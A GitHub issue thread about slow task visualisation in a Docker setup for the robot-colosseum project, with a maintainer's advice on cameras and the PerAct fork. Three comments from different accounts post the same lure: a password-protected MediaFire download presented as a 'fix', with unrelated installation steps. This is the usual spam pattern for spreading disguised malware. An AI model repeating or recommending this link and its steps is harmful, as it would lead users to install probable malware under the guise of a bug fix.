### ISSUE TITLE
very slow in docker

### ISSUE THREAD

**Issue by rainbow979** [robot-colosseum/robot-colosseum#7]
I have followed the instructions to install in the docker with DockerFile_nvidia. But when I tried to run visualize_task.py, it was very slow (2 mins for one episode even using headless=True)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by wpumacay** [comment]
Here is a video of how it runs on my machine using docker and not in headless mode.

https://github.com/user-attachments/assets/90abeb93-56d3-4f5a-b322-03a4ad27cc4e

**Comment by rainbow979** [comment]
After removing some cameras, it takes 30 seconds to generate one demo.

**Comment by rainbow979** [comment]
I am wondering if the point clouds become incomplete when removing some cameras

**Comment by wpumacay** [comment]
Uhmmm, incomplete as in having holes?. Will indeed have missing sections due to removing some cameras. Still, should be fine if you're not using those cameras. Btw, are you using this with one of the baseline algorithms? (PerAct, RVT)?

**Comment by rainbow979** [comment]
Maybe. Since they both use multi cameras.

**Comment by wpumacay** [comment]
Oh, just in case, make sure you're using the correct fork they list on their as a git submodule. It's a fork of a fork made for PerAct. The data collected should have some extra fields in the observation object.

I'll close this for the moment. Feel free to re-open if needed.
